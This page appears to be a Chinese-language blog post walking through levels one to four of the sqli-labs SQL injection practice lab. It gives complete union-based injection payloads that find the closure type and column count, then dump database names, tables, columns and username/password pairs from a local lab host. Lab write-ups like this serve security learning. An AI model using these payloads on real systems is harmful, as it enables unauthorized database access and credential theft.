<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="mysql数据库相关知识 information_schema：表示所有信息，包括库、表、列 information_schema.tables：记录所有表名信息的表 information_schema.columns：记录所有列名信息的表 table_schema：数据库的名称 table_name:表名 column_name:列名 group_concat():显示所有查询到的数据  my">
<meta property="og:type" content="article">
<meta property="og:title" content="sqli-labs(一)">
<meta property="og:url" content="http://example.com/2023/10/14/sqli-labs/index.html">
<meta property="og:site_name" content="寒山社">
<meta property="og:description" content="mysql数据库相关知识 information_schema：表示所有信息，包括库、表、列 information_schema.tables：记录所有表名信息的表 information_schema.columns：记录所有列名信息的表 table_schema：数据库的名称 table_name:表名 column_name:列名 group_concat():显示所有查询到的数据  my">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2023/10/14/sqli-labs/image-20231014123205010.png">
<meta property="og:image" content="http://example.com/2023/10/14/sqli-labs/image-20231014123327199.png">
<meta property="og:image" content="http://example.com/2023/10/14/sqli-labs/image-20231014123445004.png">
<meta property="og:image" content="http://example.com/2023/10/14/sqli-labs/image-20231014123816252.png">
<meta property="og:image" content="http://example.com/2023/10/14/sqli-labs/image-20231014124324019.png">
<meta property="og:image" content="http://example.com/2023/10/14/sqli-labs/image-20231014124951057.png">
<meta property="og:image" content="http://example.com/2023/10/14/sqli-labs/image-20231014125204707.png">
<meta property="og:image" content="http://example.com/2023/10/14/sqli-labs/image-20231014130022301.png">
<meta property="og:image" content="http://example.com/2023/10/14/sqli-labs/image-20231014130341536.png">
<meta property="og:image" content="http://example.com/2023/10/14/sqli-labs/image-20231014130839008.png">
<meta property="og:image" content="http://example.com/2023/10/14/sqli-labs/image-20231014132300520.png">
<meta property="og:image" content="http://example.com/2023/10/14/sqli-labs/image-20231014132417928.png">
<meta property="og:image" content="http://example.com/2023/10/14/sqli-labs/image-20231014135540116.png">
<meta property="og:image" content="http://example.com/2023/10/14/sqli-labs/image-20231014135707991.png">
<meta property="og:image" content="http://example.com/2023/10/14/sqli-labs/image-20231014135810198.png">
<meta property="og:image" content="http://example.com/2023/10/14/sqli-labs/image-20231014145117618.png">
<meta property="og:image" content="http://example.com/2023/10/14/sqli-labs/image-20231014145229939.png">
<meta property="og:image" content="http://example.com/2023/10/14/sqli-labs/image-20231014145518050.png">
<meta property="article:published_time" content="2023-10-14T04:29:51.000Z">
<meta property="article:modified_time" content="2023-10-14T07:06:28.647Z">
<meta property="article:author" content="molksa">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2023/10/14/sqli-labs/image-20231014123205010.png">

<link rel="canonical" href="http://example.com/2023/10/14/sqli-labs/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>sqli-labs(一) | 寒山社</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">寒山社</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/10/14/sqli-labs/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="molksa">
      <meta itemprop="description" content="点点滴滴的积累">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="寒山社">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          sqli-labs(一)
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2023-10-14 12:29:51 / 修改时间：15:06:28" itemprop="dateCreated datePublished" datetime="2023-10-14T12:29:51+08:00">2023-10-14</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h3 id="mysql数据库相关知识"><a href="#mysql数据库相关知识" class="headerlink" title="mysql数据库相关知识"></a>mysql数据库相关知识</h3><ol>
<li>information_schema：表示所有信息，包括库、表、列</li>
<li>information_schema.tables：记录所有表名信息的表</li>
<li>information_schema.columns：记录所有列名信息的表</li>
<li>table_schema：数据库的名称</li>
<li>table_name:表名</li>
<li>column_name:列名</li>
<li>group_concat():显示所有查询到的数据</li>
</ol>
<p>mysql数据库5.0以上版本有一个自带的数据库叫做information_schema,该数据库下面有两个表一个是tables和columns。tables这个表的table_name字段下面是所有数据库存在的表名。table_schema字段下是所有表名对应的数据库名。columns这个表的colum_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库。</p>
<p>注：如果字段本身是int类型，并且在查询语句中该字段的值被双引号或者单引号包裹，则只要值是以正确数字开头的，后面接多余的字符还是可以返回正确的查询结果，甚至单引号中可以包含双引号，双引号中可以包含单引号。</p>
<h3 id="sqli-labs第一关"><a href="#sqli-labs第一关" class="headerlink" title="sqli-labs第一关"></a>sqli-labs第一关</h3><p>首先先判断该注入是数字型还是字符型</p>
<p>我们输入?id&#x3D;1</p>
<img src="/2023/10/14/sqli-labs/image-20231014123205010.png" class="" title="image-20231014123205010">

<p>当我们输入不同数字时，界面显示的结果也不一样，说明我们输入的参数被带入到了数据库中进行查询</p>
<img src="/2023/10/14/sqli-labs/image-20231014123327199.png" class="" title="image-20231014123327199">

<p>当我们输入?id&#x3D;1’时</p>
<img src="/2023/10/14/sqli-labs/image-20231014123445004.png" class="" title="image-20231014123445004">

<p>会提示我们说SQL语句存在错误</p>
<img src="/2023/10/14/sqli-labs/image-20231014123816252.png" class="" title="image-20231014123816252">

<p>而使用–+注释掉后，界面恢复了正常。这说明原始SQL语句大致格式为select a from b where c&#x3D;’ ‘;</p>
<p>为单引号闭合。</p>
<p>接下来我们要尝试爆出一下数据库的相关信息</p>
<p>我们可以构造?id&#x3D;1’ order by 4 –+ ,这个语句被带入到原始SQL语句后，执行效果为：按照表中第4列进行排序</p>
<img src="/2023/10/14/sqli-labs/image-20231014124324019.png" class="" title="image-20231014124324019">

<p>而通过界面回显，我们知道该表中只有3列，我们可以通过输入?id&#x3D;1’ order by 3 –+来验证。</p>
<p>接下来我们要爆出显示位，就是判断表里哪些列的数据会在界面上显示。</p>
<p>输入?id&#x3D;-1’union select 1,2,3–+（注：这里-1是为了关闭原始查询，从而执行后面的查询语句）</p>
<img src="/2023/10/14/sqli-labs/image-20231014124951057.png" class="" title="image-20231014124951057">

<p>可以知晓第2，3列的数据是会显示在界面上的</p>
<p>知道这有什么用呢？我们可以查询数据库的版本和当前数据库名，让它们显示在界面上。</p>
<p>输入：<code>?id=-1&#39;union select 1,database(),version()--+</code></p>
<img src="/2023/10/14/sqli-labs/image-20231014125204707.png" class="" title="image-20231014125204707">

<p>知道数据库名后，我们可以查询该数据库下所有的表名</p>
<p>输入：<code>?id=-1&#39;union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=&#39;security&#39; --+</code></p>
<img src="/2023/10/14/sqli-labs/image-20231014130022301.png" class="" title="image-20231014130022301">

<p>很显然，用户的敏感信息保存在users表中，我们下一步就是要查询users表中的字段名</p>
<p>输入：<code>?id=-1&#39;union select 1,2,group_concat(column_name) from information_schema.columns where table_name=&#39;users&#39; --+</code></p>
<img src="/2023/10/14/sqli-labs/image-20231014130341536.png" class="" title="image-20231014130341536">

<p>最后就是愉快的爆出username和password等信息了</p>
<p>输入：<code>?id=-1&#39;union select 1,2,group_concat(username,password) from users --+</code></p>
<img src="/2023/10/14/sqli-labs/image-20231014130839008.png" class="" title="image-20231014130839008">



<h3 id="sqli-labs第二关"><a href="#sqli-labs第二关" class="headerlink" title="sqli-labs第二关"></a>sqli-labs第二关</h3><p>还是老样子，先判断类型</p>
<p>输入：<code>?id=1 and 1=2</code></p>
<img src="/2023/10/14/sqli-labs/image-20231014132300520.png" class="" title="image-20231014132300520">

<p>确定为数字型了</p>
<p>且输入：<code>?id=1&#39;-- s</code></p>
<img src="/2023/10/14/sqli-labs/image-20231014132417928.png" class="" title="image-20231014132417928">

<p>可以知道输入不需要闭合。后面的就和第一关一样了</p>
<p>判断列数：</p>
<p><code>http://sqli-labs:8084/Less-2/?id=1 order by 3-- s</code></p>
<p><code>http://sqli-labs:8084/Less-2/?id=1 order by 4-- s</code></p>
<p>确定回显：</p>
<p><code>http://sqli-labs:8084/Less-2/?id=1 union select 1,2,3-- s</code></p>
<p>爆出数据库相关信息：</p>
<p><code>http://sqli-labs:8084/Less-2/?id=-1 union select 1,database(),version()-- s</code></p>
<p>爆出所有表名：</p>
<p><code>http://sqli-labs:8080/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=&#39;security&#39;-- s</code></p>
<p>爆出表内列名：</p>
<p><code>http://sqli-labs:8080/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=&#39;users&#39;-- s</code></p>
<p>爆出敏感信息：</p>
<p><code>http://sqli-labs:8080/Less-2/?id=-1 union select 1,2,group_concat(username,password) from users-- s</code></p>
<h3 id="sqli-labs第三关"><a href="#sqli-labs第三关" class="headerlink" title="sqli-labs第三关"></a>sqli-labs第三关</h3><p>输入：<code>?id=1 and 1=2</code></p>
<img src="/2023/10/14/sqli-labs/image-20231014135540116.png" class="" title="image-20231014135540116">

<p>没有出现报错，说明不是数字型</p>
<p>然后判断闭合。</p>
<p>输入：<code>?id=1&#39;</code></p>
<img src="/2023/10/14/sqli-labs/image-20231014135707991.png" class="" title="image-20231014135707991">

<p>根据报错回显，猜测应该加）</p>
<p>输入:<code>?id=1&#39;)-- s</code></p>
<img src="/2023/10/14/sqli-labs/image-20231014135810198.png" class="" title="image-20231014135810198">

<p>可以确定了是’)闭合</p>
<p>那么剩下的就是老几样了</p>
<p>判断列数：</p>
<p><code>http://sqli-labs:8084/Less-3/?id=1&#39;) order by 3-- s</code></p>
<p><code>http://sqli-labs:8084/Less-3/?id=1&#39;) order by 4-- s</code></p>
<p>确定回显：</p>
<p><code>http://sqli-labs:8084/Less-3/?id=1&#39;) union select 1,2,3-- s</code></p>
<p>爆出数据库相关信息：</p>
<p><code>http://sqli-labs:8084/Less-3/?id=-1&#39;) union select 1,database(),version()-- s</code></p>
<p>爆出所有表名：</p>
<p><code>http://sqli-labs:8080/Less-3/?id=-1&#39;) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=&#39;security&#39;-- s</code></p>
<p>爆出表内列名：</p>
<p><code>http://sqli-labs:8080/Less-3/?id=-1&#39;) union select 1,2,group_concat(column_name) from information_schema.columns where table_name=&#39;users&#39;-- s</code></p>
<p>爆出敏感信息：</p>
<p><code>http://sqli-labs:8080/Less-3/?id=-1&#39;) union select 1,2,group_concat(username,password) from users-- s</code></p>
<h3 id="sqli-labs第四关"><a href="#sqli-labs第四关" class="headerlink" title="sqli-labs第四关"></a>sqli-labs第四关</h3><p>输入：<code>?id=1 and 1=2</code></p>
<img src="/2023/10/14/sqli-labs/image-20231014145117618.png" class="" title="image-20231014145117618">

<p>确定不为数字型</p>
<p>输入：<code>?id=1&quot;</code></p>
<img src="/2023/10/14/sqli-labs/image-20231014145229939.png" class="" title="image-20231014145229939">

<p>注：这关输入id&#x3D;1’是不会报错的</p>
<p>可以判断是”)闭合</p>
<p>输入：<code>?id=1&quot;)-- s</code></p>
<img src="/2023/10/14/sqli-labs/image-20231014145518050.png" class="" title="image-20231014145518050">

<p>知道闭合后，后面的就跟前几关一样了。</p>
<p>判断列数：</p>
<p><code>http://sqli-labs:8084/Less-4/?id=1&quot;) order by 3-- s</code></p>
<p><code>http://sqli-labs:8084/Less-4/?id=1&quot;) order by 4-- s</code></p>
<p>确定回显：</p>
<p><code>http://sqli-labs:8084/Less-4/?id=1&quot;) union select 1,2,3-- s</code></p>
<p>爆出数据库相关信息：</p>
<p><code>http://sqli-labs:8084/Less-4/?id=1&quot;) union select 1,database(),version()-- s</code></p>
<p>爆出所有表名：</p>
<p><code>http://sqli-labs:8080/Less-4/?id=-1&quot;) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=&#39;security&#39;-- s</code></p>
<p>爆出表内列名：</p>
<p><code>http://sqli-labs:8080/Less-4/?id=-1&quot;) union select 1,2,group_concat(column_name) from information_schema.columns where table_name=&#39;users&#39;-- s</code></p>
<p>爆出敏感信息：</p>
<p><code>http://sqli-labs:8080/Less-4/?id=-1&quot;) union select 1,2,group_concat(username,password) from users-- s</code></p>
<h3 id="sqli-labs第五关"><a href="#sqli-labs第五关" class="headerlink" title="sqli-labs第五关"></a>sqli-labs第五关</h3>
    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/10/10/SQL%E6%B3%A8%E5%85%A5/" rel="prev" title="SQL注入">
      <i class="fa fa-chevron-left"></i> SQL注入
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#mysql%E6%95%B0%E6%8D%AE%E5%BA%93%E7%9B%B8%E5%85%B3%E7%9F%A5%E8%AF%86"><span class="nav-number">1.</span> <span class="nav-text">mysql数据库相关知识</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sqli-labs%E7%AC%AC%E4%B8%80%E5%85%B3"><span class="nav-number">2.</span> <span class="nav-text">sqli-labs第一关</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sqli-labs%E7%AC%AC%E4%BA%8C%E5%85%B3"><span class="nav-number">3.</span> <span class="nav-text">sqli-labs第二关</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sqli-labs%E7%AC%AC%E4%B8%89%E5%85%B3"><span class="nav-number">4.</span> <span class="nav-text">sqli-labs第三关</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sqli-labs%E7%AC%AC%E5%9B%9B%E5%85%B3"><span class="nav-number">5.</span> <span class="nav-text">sqli-labs第四关</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sqli-labs%E7%AC%AC%E4%BA%94%E5%85%B3"><span class="nav-number">6.</span> <span class="nav-text">sqli-labs第五关</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="molksa"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">molksa</p>
  <div class="site-description" itemprop="description">点点滴滴的积累</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">3</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">molksa</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"model":{"jsonPath":"live2d-widget-model-miku  //使用的样式"},"display":{"position":"right","width":180,"height":300},"mobile":{"show":true},"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
